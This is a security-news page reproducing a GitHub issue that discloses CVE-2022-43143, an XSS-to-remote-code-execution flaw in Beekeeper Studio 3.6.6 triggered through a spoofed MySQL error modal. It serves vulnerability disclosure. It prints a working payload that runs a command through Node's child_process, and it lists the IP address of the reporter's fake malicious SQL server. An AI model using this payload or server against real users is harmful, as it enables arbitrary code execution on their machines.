Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-43143: BUG: Beekeeper Remote Code Execution via XSS · Issue #1393 · beekeeper-studio/beekeeper-studio

A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.

CVE
#sql#xss#vulnerability#web#mac#windows#linux#rce#auth

Author: [email protected]

Date: 2022-10-07

OS: Windows, Linux, MacOS

Beekeeper Studio Version: 3.6.6

DB Type&Version: MySQL 5.7 and 8.0 Also

Summary

It has been possible to trigger remote code execution via Beekeeper’s Modal Container.

Description

Beekeeper has the modal container which indicates the user’s interaction is valid and due to a lack of sanitization of the modal contents, It has an XSS vulnerability like this:

[1]

[2]

The modal’s content also is transferred by MySQL packet when only the user’s interaction is invalid like this:

So, Taking advantage of the report in CVE-2022-26174, it has been possible Remote Code Execution via Modal Container.

In this case, I made the fake MySQL server which spoofs user’s modal output when the user puts some data in a table.

This is my sample fake SQL server : poc.py

You can see this poc video that fake SQL server triggers RCE via Beekeeper.

PoC_Video

In this video, I used this XSS script <input type="text" onfocus="require(‘child_process’).execSync(‘calc.exe’)" autofocus /> for modal error output and any input that user passes is replaced by that XSS script and re-passed to the user.

Finally, Malicious Code is triggered in the user’s PC and is continued until the modal is inactivated.

What’s More?

  • Not only data inserting functions but also any functions which use error modal(e.g. create table), It seems that we can trigger RCE too.

Temporary Fake SQL Server

146.56.129.188:3306

Related news

CVE-2022-26174: RCE Vulnerability in Beekeeper Studio · Issue #1051 · beekeeper-studio/beekeeper-studio

A remote code execution (RCE) vulnerability in Beekeeper Studio v3.2.0 allows attackers to execute arbitrary code via a crafted payload injected into the display fields.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907